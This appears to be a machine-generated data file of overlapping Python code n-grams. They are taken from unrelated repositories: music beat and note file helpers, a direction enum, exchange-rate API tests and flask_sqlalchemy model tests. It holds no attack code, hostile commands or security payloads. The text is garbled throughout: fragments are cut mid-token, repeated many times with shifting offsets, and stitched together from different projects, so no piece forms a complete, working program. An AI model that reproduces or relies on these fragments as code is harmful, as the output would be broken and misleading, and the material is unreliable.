isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt)", "fmt : str or sequence of strs, optional A single format (e.g. '%.3f'),", "Write the notes to a file. Parameters ---------- notes : numpy array, shape", "a better solution tempi = values[values > split_value] strengths = values[values <= split_value]", "# consider only the two strongest tempi and strengths elif len(tempi) > 1:", "better solution tempi = values[values > split_value] strengths = values[values <= split_value] #", "yield an open file handle yield f # close the file if needed", ": str or sequence of strs, optional A sequence of formats (e.g. ['%.3f',", "['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file handle File to", "note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str", "multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter :", "beginning of the file as comment. Returns ------- numpy array Notes. \"\"\" #", "and <label> is a string. Parameters ---------- filename : str or file handle", "to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx]", "Labelled segments are represented as numpy structured array with three named columns: 'start'", "@contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an open file or", "write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the", "format as a numpy array and write to output out = np.array([t1, t2,", "find a better solution tempi = values[values > split_value] strengths = values[values <=" ]
[ "class Side(Enum): Left = 0 Up = 1 Right = 2 Down =", "Enum class Side(Enum): Left = 0 Up = 1 Right = 2 Down", "Side(Enum): Left = 0 Up = 1 Right = 2 Down = 3", "import Enum class Side(Enum): Left = 0 Up = 1 Right = 2", "<reponame>paldynaagata/plumber from enum import Enum class Side(Enum): Left = 0 Up = 1", "enum import Enum class Side(Enum): Left = 0 Up = 1 Right =", "from enum import Enum class Side(Enum): Left = 0 Up = 1 Right" ]
[ "'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates',", "= ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1,", "date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert", "2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols,", "exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at',", "{'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in", "= exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert", "assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at =", "symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020,", "response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'}", "1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols)", "= ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys())", "def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD',", "date(2020, 1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at,", "symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert", "= date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response)", "response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates',", "= exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at',", "== {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v", "<filename>typhoon/examples/airflow_docker/src/tests/integration/exchange_rates_api_test.py<gh_stars>10-100 from datetime import date from functions import exchange_rates_api def test_xr_get(): symbols =", "['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) ==", "base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def", "1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys())", "== {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR',", "= date(2020, 1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at,", "3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) ==", "datetime import date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP',", "exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1),", "import date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD']", "set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k,", "from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response =", "end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, )", "set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols =", "'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert set(v.keys())", "1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD',", "set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2)", "== set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1,", "{'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP',", "set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020,", "def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at", "1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) ==", "'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1, 3) response =", "start_at = date(2020, 1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history(", "'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items():", "'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1, 3) response", "'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date',", "test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols)", "end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert", "from datetime import date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR',", "symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history():", "symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) ==", "print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()}", "assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for", "'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert", "set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert set(v.keys()) == set(symbols)", "date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response", "['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1, 3)", "'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at", "exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys())", "start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'}", "base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys())", ") print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(),", "import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1,", "assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert set(v.keys()) ==", "assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols", "test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at =", "functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020,", "'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD']" ]
[ "app.app_context(): # test the number of the maps is increased by one assert", "test_relation(app): '''A simple test of adding an object with relation ''' map1 =", "= Map.query.filter_by(name='map1').first() # the query returns the same Python object assert map1 is", "initial number of the maps to compare later nmaps = len(Map.query.all()) # this", "beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned", "is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert", "map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding an object with", "map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context():", "assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different", "primarily for the developer to understand # how models in flask_sqlalchemy work. #", "simple test about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit()", "__________________________________________________________________|| def test_simple(app): '''A simple test of adding an object ''' with app.app_context():", "acondbs.models import Map, Beam # These tests are written primarily for the developer", "assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id", "work. # __________________________________________________________________|| def test_simple(app): '''A simple test of adding an object '''", "== map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding an object", "Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app context assert map1", "test_simple(app): '''A simple test of adding an object ''' with app.app_context(): # save", "in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def", "beam1.beam_id is not None # The foreign key is correctly set assert map1.map_id", "relation has been already established assert map1 is beam1.map assert [beam1] == map1.beams", "assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding", "is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1", "understand # how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple", "map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the", "Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of", "Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the", "# The relation is preserved in a different app context assert map1 is", "map1.map_id is not None assert beam1.beam_id is not None # The foreign key", "the new map can be retrieved in a different app context map1_ =", "this instantiation doesn't need be within a app context map1 = Map(name=\"map1\") with", "sa.session.commit() with app.app_context(): # test the number of the maps is increased by", "by one assert (nmaps + 1) == len(Map.query.all()) # the new map can", "'''A simple test about the primary key ''' map1 = Map(name=\"map1\") # The", "# this instantiation doesn't need be within a app context map1 = Map(name=\"map1\")", "for the developer to understand # how models in flask_sqlalchemy work. # __________________________________________________________________||", "assert (nmaps + 1) == len(Map.query.all()) # the new map can be retrieved", "context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A", "= Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app context assert", "the number of the maps is increased by one assert (nmaps + 1)", "assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are", "written primarily for the developer to understand # how models in flask_sqlalchemy work.", "the same Python object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first()", "# The primary key (map_id) is None at this point assert map1.map_id is", "+ 1) == len(Map.query.all()) # the new map can be retrieved in a", "map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id == beam1.input_map_id # __________________________________________________________________||", "with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the maps", "Map.query.filter_by(name='map1').first() # In a different app context, no longer the same Python object", "# In a different app context, no longer the same Python object assert", "an object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) #", "keys are assigned assert map1.map_id is not None assert beam1.beam_id is not None", "about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ =", "context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the", "not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key", "is increased by one assert (nmaps + 1) == len(Map.query.all()) # the new", "is not None assert beam1.beam_id is not None # The foreign key is", "relation is preserved in a different app context assert map1 is beam1.map assert", "app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in", "nmaps = len(Map.query.all()) # this instantiation doesn't need be within a app context", "# __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object ''' map1 =", "Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the", "simple test of adding an object ''' with app.app_context(): # save the initial", "# __________________________________________________________________|| def test_simple(app): '''A simple test of adding an object ''' with", "assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id == beam1.input_map_id #", "map_id is not None with app.app_context(): # The object can be retrived by", "The relation has been already established assert map1 is beam1.map assert [beam1] ==", "from acondbs.db.sa import sa from acondbs.models import Map, Beam # These tests are", "of the maps to compare later nmaps = len(Map.query.all()) # this instantiation doesn't", "map1.map_id assert map_id is not None with app.app_context(): # The object can be", "# The primary and foreign keys are still None assert map1.map_id is None", "map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python object assert map1", "adding an object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1)", "established assert map1 is beam1.map assert [beam1] == map1.beams # The primary and", "the maps to compare later nmaps = len(Map.query.all()) # this instantiation doesn't need", "def test_relation(app): '''A simple test of adding an object with relation ''' map1", "to understand # how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A", "assert map_id is not None with app.app_context(): # The object can be retrived", "simple test of adding an object with relation ''' map1 = Map(name=\"map1\") beam1", "map_id = map1.map_id assert map_id is not None with app.app_context(): # The object", "1) == len(Map.query.all()) # the new map can be retrieved in a different", "None assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit()", "test_primary_key(app): '''A simple test about the primary key ''' map1 = Map(name=\"map1\") #", "assigned assert map1.map_id is not None assert beam1.beam_id is not None # The", "'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding an", "map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test", "maps is increased by one assert (nmaps + 1) == len(Map.query.all()) # the", "'''A simple test of adding an object ''' with app.app_context(): # save the", "is not None with app.app_context(): # The object can be retrived by the", "map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple", "= Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different", "foreign keys are still None assert map1.map_id is None assert beam1.beam_id is None", "len(Map.query.all()) # this instantiation doesn't need be within a app context map1 =", "app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned map_id =", "= Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test", "test_python_object(app): '''A simple test about Python object ''' map1 = Map(name=\"map1\") with app.app_context():", "app.app_context(): # save the initial number of the maps to compare later nmaps", "with app.app_context(): # test the number of the maps is increased by one", "different app context, no longer the same Python object assert map1 is not", "app context assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id ==", "beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already established assert map1", "with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned map_id", "different app context assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id", "# save the initial number of the maps to compare later nmaps =", "primary keys are assigned assert map1.map_id is not None assert beam1.beam_id is not", "object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The", "== map1.beams # The primary and foreign keys are still None assert map1.map_id", "models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of adding", "def test_simple(app): '''A simple test of adding an object ''' with app.app_context(): #", "Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python", "# The primary keys are assigned assert map1.map_id is not None assert beam1.beam_id", "sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id is not None", "isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object '''", "sa.session.commit() # After the commit, map_id is automatically assigned map_id = map1.map_id assert", "app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test", "After the commit, map_id is automatically assigned map_id = map1.map_id assert map_id is", "map can be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert", "test of adding an object with relation ''' map1 = Map(name=\"map1\") beam1 =", "is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary", "are still None assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id", "map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a", "number of the maps is increased by one assert (nmaps + 1) ==", "returns the same Python object assert map1 is map1_ with app.app_context(): map1_ =", "= Map.query.filter_by(name='map1').first() # In a different app context, no longer the same Python", "at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After", "acondbs.db.sa import sa from acondbs.models import Map, Beam # These tests are written", "map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no", "Python object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple", "map_id is automatically assigned map_id = map1.map_id assert map_id is not None with", "test about the primary key ''' map1 = Map(name=\"map1\") # The primary key", "object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() #", "len(Map.query.all()) # the new map can be retrieved in a different app context", "the initial number of the maps to compare later nmaps = len(Map.query.all()) #", "increased by one assert (nmaps + 1) == len(Map.query.all()) # the new map", "beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app context", "None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned", "maps to compare later nmaps = len(Map.query.all()) # this instantiation doesn't need be", "= Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about", "None # The foreign key is correctly set assert map1.map_id == beam1.input_map_id with", "object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a", "Map.query.filter_by(name='map1').first() # the query returns the same Python object assert map1 is map1_", "== len(Map.query.all()) # the new map can be retrieved in a different app", "assigned map_id = map1.map_id assert map_id is not None with app.app_context(): # The", "# test the number of the maps is increased by one assert (nmaps", "test the number of the maps is increased by one assert (nmaps +", "the maps is increased by one assert (nmaps + 1) == len(Map.query.all()) #", "assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about", "different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app):", "point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit,", "the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name #", "# __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key ''' map1", "the query returns the same Python object assert map1 is map1_ with app.app_context():", "'''A simple test about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1)", "automatically assigned map_id = map1.map_id assert map_id is not None with app.app_context(): #", "sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python object assert", "Map, Beam # These tests are written primarily for the developer to understand", "Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app", "with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same", "developer to understand # how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app):", "about the primary key ''' map1 = Map(name=\"map1\") # The primary key (map_id)", "The primary and foreign keys are still None assert map1.map_id is None assert", "# how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test", "object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test", "the same Python object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app):", "this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the", "def test_python_object(app): '''A simple test about Python object ''' map1 = Map(name=\"map1\") with", "can be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_,", "beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is", "In a different app context, no longer the same Python object assert map1", "The foreign key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1", "map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number", "of the maps is increased by one assert (nmaps + 1) == len(Map.query.all())", "The relation is preserved in a different app context assert map1 is beam1.map", "''' map1 = Map(name=\"map1\") # The primary key (map_id) is None at this", "no longer the same Python object assert map1 is not map1_ # __________________________________________________________________||", "doesn't need be within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1)", "# The relation has been already established assert map1 is beam1.map assert [beam1]", "already established assert map1 is beam1.map assert [beam1] == map1.beams # The primary", "query returns the same Python object assert map1 is map1_ with app.app_context(): map1_", "Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already established assert", "is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context,", "be within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with", "object can be retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first()", "is automatically assigned map_id = map1.map_id assert map_id is not None with app.app_context():", "assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is None with", "to compare later nmaps = len(Map.query.all()) # this instantiation doesn't need be within", "test about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_", "assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() #", "compare later nmaps = len(Map.query.all()) # this instantiation doesn't need be within a", "__________________________________________________________________|| def test_python_object(app): '''A simple test about Python object ''' map1 = Map(name=\"map1\")", "instantiation doesn't need be within a app context map1 = Map(name=\"map1\") with app.app_context():", "of adding an object ''' with app.app_context(): # save the initial number of", "Beam # These tests are written primarily for the developer to understand #", "app context, no longer the same Python object assert map1 is not map1_", "app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id is not", "context, no longer the same Python object assert map1 is not map1_ #", "map1 is beam1.map assert [beam1] == map1.beams # The primary and foreign keys", "# the query returns the same Python object assert map1 is map1_ with", "== beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation", "been already established assert map1 is beam1.map assert [beam1] == map1.beams # The", "are assigned assert map1.map_id is not None assert beam1.beam_id is not None #", "correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 =", "beam1.map assert [beam1] == map1.beams # The primary and foreign keys are still", "is not None # The foreign key is correctly set assert map1.map_id ==", "with app.app_context(): # save the initial number of the maps to compare later", "with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved", "map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key '''", "assert [beam1] == map1.beams # The primary and foreign keys are still None", "a different app context, no longer the same Python object assert map1 is", "later nmaps = len(Map.query.all()) # this instantiation doesn't need be within a app", "= Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already established", "of adding an object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\",", "a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): #", "These tests are written primarily for the developer to understand # how models", "number of the maps to compare later nmaps = len(Map.query.all()) # this instantiation", "in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________||", "sa from acondbs.models import Map, Beam # These tests are written primarily for", "tests are written primarily for the developer to understand # how models in", "another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app):", "Beam(name=\"beam1\", map=map1) # The relation has been already established assert map1 is beam1.map", "assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() #", "key ''' map1 = Map(name=\"map1\") # The primary key (map_id) is None at", "assert beam1.beam_id is not None # The foreign key is correctly set assert", "= Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of", "a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def", "__________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key ''' map1 =", "one assert (nmaps + 1) == len(Map.query.all()) # the new map can be", "None at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() #", "__________________________________________________________________|| def test_relation(app): '''A simple test of adding an object with relation '''", "is None assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1)", "primary key ''' map1 = Map(name=\"map1\") # The primary key (map_id) is None", "Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object ''' map1", "None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id", "Map(name=\"map1\") # The primary key (map_id) is None at this point assert map1.map_id", "context assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id == beam1.input_map_id", "from acondbs.models import Map, Beam # These tests are written primarily for the", "import sa from acondbs.models import Map, Beam # These tests are written primarily", "= Map(name=\"map1\") # The primary key (map_id) is None at this point assert", "''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the", "sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python object", "app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no longer the", "test of adding an object ''' with app.app_context(): # save the initial number", "foreign key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 =", "(map_id) is None at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1)", "Python object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In", "new map can be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first()", "context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple", "None assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is None", "can be retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert", "primary key (map_id) is None at this point assert map1.map_id is None with", "map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is", "how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of", "not None with app.app_context(): # The object can be retrived by the map_id", "(nmaps + 1) == len(Map.query.all()) # the new map can be retrieved in", "app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the maps is", "preserved in a different app context assert map1 is 